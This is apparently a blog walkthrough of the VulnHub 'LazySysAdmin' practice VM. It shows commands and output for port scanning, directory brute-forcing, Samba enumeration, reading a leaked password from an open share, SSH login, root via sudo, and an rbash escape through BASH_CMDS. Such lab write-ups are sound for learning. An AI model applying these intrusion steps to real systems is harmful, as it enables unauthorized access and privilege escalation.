
Quick write-up of LazySysAdmin, found here: https://www.vulnhub.com/entry/lazysysadmin-1,205/
This is labeled as “beginner-intermediate” but probably leaning more on the beginner side. Anyhow…let’s do this!
Basic nmap scan…
root@kali:~/vulnhub/lazysysadmin# nmap -sS -sV 172.16.115.134 -oA lazy Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 00:08 EST Nmap scan report for 172.16.115.134 Host is up (0.00047s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 3306/tcp open mysql MySQL (unauthorized) 6667/tcp open irc InspIRCd MAC Address: 00:0C:29:CE:7D:7F (VMware) Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.06 seconds
Check the basics…
root@kali:~/vulnhub/lazysysadmin# curl http://172.16.115.134/robots.txt User-agent: * Disallow: /old/ Disallow: /test/ Disallow: /TR2/ Disallow: /Backnode_files/
Checking those directories yields nothing of interest…moving on. Let’s do a quick directory brute-force.
root@kali:~/vulnhub/lazysysadmin# gobuster -u http://172.16.115.134 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e Gobuster v1.2 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://172.16.115.134/ [+] Threads : 10 [+] Wordlist : /usr/share/seclists/Discovery/Web_Content/common.txt [+] Status codes : 301,302,307,403,500,200,204 [+] Expanded : true ===================================================== http://172.16.115.134/.htpasswd (Status: 403) http://172.16.115.134/.hta (Status: 403) http://172.16.115.134/.htaccess (Status: 403) http://172.16.115.134/apache (Status: 301) http://172.16.115.134/index.html (Status: 200) http://172.16.115.134/info.php (Status: 200) http://172.16.115.134/javascript (Status: 301) http://172.16.115.134/old (Status: 301) http://172.16.115.134/phpmyadmin (Status: 301) http://172.16.115.134/robots.txt (Status: 200) http://172.16.115.134/server-status (Status: 403) http://172.16.115.134/test (Status: 301) http://172.16.115.134/wordpress (Status: 301) http://172.16.115.134/wp (Status: 301) =====================================================
WordPress, phpinfo, phpmyadmin…noted. Let’s see what else we can find on this box. We saw TCP 139 and 445 open. Let’s probe them with enum4linux.
root@kali:~/vulnhub/lazysysadmin# enum4linux 172.16.115.134 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Nov 6 00:39:14 2017 ========================== | Target Information | ========================== Target ........... 172.16.115.134 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ====================================================== | Enumerating Workgroup/Domain on 172.16.115.134 | ====================================================== [+] Got domain/workgroup name: WORKGROUP [...SNIP...] =========================================== | Share Enumeration on 172.16.115.134 | =========================================== WARNING: The "syslog" option is deprecated OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers share$ Disk Sumshare IPC$ IPC IPC Service (Web server) Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP LAZYSYSADMIN [+] Attempting to map shares on 172.16.115.134 //172.16.115.134/print$ Mapping: DENIED, Listing: N/A //172.16.115.134/share$ Mapping: OK, Listing: OK //172.16.115.134/IPC$ Mapping: OK Listing: DENIED [...SNIP...] S-1-22-1-1000 Unix User\togie (Local User)
Well…that looks interesting. Leaving a misconfigured share is something a Lazy Sys Admin might do. We also have a local user named “togie.” Let’s see what we can find in the share.
First, we mount the share, and then start poking around…
root@kali:~/vulnhub/lazysysadmin# mkdir /mnt/cifs root@kali:~/vulnhub/lazysysadmin# mount -t cifs //172.16.115.134/share$ -o username=guest /mnt/cifs/ root@kali:~/vulnhub/lazysysadmin# ls /mnt/cifs/ Backnode_files apache deets.txt index.html info.php old robots.txt test todolist.txt wordpress wp root@kali:~/vulnhub/lazysysadmin# cat /mnt/cifs/deets.txt CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345
Surely, 12345 can’t be a real user’s password? How about a lazy sysadmin’s password? Let’s try it with our the user we found earlier…
root@kali:~/vulnhub/lazysysadmin# ssh togie@172.16.115.134 ################################################################################################## # Welcome to Web_TR1 # # All connections are monitored and recorded # # Disconnect IMMEDIATELY if you are not an authorized user! # ################################################################################################## togie@172.16.115.134's password: Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686) * Documentation: https://help.ubuntu.com/ System information as of Mon Nov 6 16:01:52 AEST 2017 System load: 0.0 Processes: 179 Usage of /: 46.1% of 2.89GB Users logged in: 0 Memory usage: 33% IP address for eth0: 172.16.115.134 Swap usage: 0% Graph this data and manage this system at: https://landscape.canonical.com/ 133 packages can be updated. 0 updates are security updates. togie@LazySysAdmin:~$
/facepalm
Ok…now we’re in as togie. Does this user have sudo access?
togie@LazySysAdmin:~$ sudo su [sudo] password for togie: root@LazySysAdmin:/home/togie# root@LazySysAdmin:/home/togie# ls /root proof.txt root@LazySysAdmin:/home/togie# cat /root/proof.txt WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 Well done :) Hope you learn't a few things along the way. Regards, Togie Mcdogie Enjoy some random strings WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7 pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02 bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
/doublefacepalm…apparently it does. Game over!
There were a few rabbit holes you could’ve gone down on this VM. One being that if you didn’t try for sudo access right away, you would’ve noticed that togie was configured to use /bin/rbash, or “restricted bash” which prevents you from running certain commands.
togie@LazySysAdmin:~$ cd /tmp -rbash: cd: restricted togie@LazySysAdmin:~$ echo $SHELL /bin/rbash
One easy way I’ve found to escape rbash is due to a vulnerability in which the BASH_CMDS environment variable is writeable from within rbash. I stumbled across this in my OSCP travels, and my inner 12 year-old appreciates it because I get to call it the “poop” vulnerability. See why: https://lists.gnu.org/archive/html/bug-bash/2017-03/msg00076.html
Anyhow…if we execute what is shown in the link, we confirm that we can escape rbash.
root@kali:~/vulnhub/lazysysadmin# ssh togie@172.16.115.134 ################################################################################################## # Welcome to Web_TR1 # # All connections are monitored and recorded # # Disconnect IMMEDIATELY if you are not an authorized user! # ################################################################################################## togie@172.16.115.134's password: [...SNIP...] togie@LazySysAdmin:~$ cd /tmp -rbash: cd: restricted togie@LazySysAdmin:~$ BASH_CMDS[poop]=/bin/bash togie@LazySysAdmin:~$ poop togie@LazySysAdmin:~$ cd /tmp togie@LazySysAdmin:/tmp$ ls -lah total 8.0K 4.0K drwxrwxrwt 2 root root 4.0K Nov 6 16:17 . 4.0K drwxr-xr-x 22 root root 4.0K Aug 21 20:10 ..
I didn’t experiment with any other methods of privilege escalation, but I suspect there’s one more…perhaps if I have time, I’ll go back and check it out.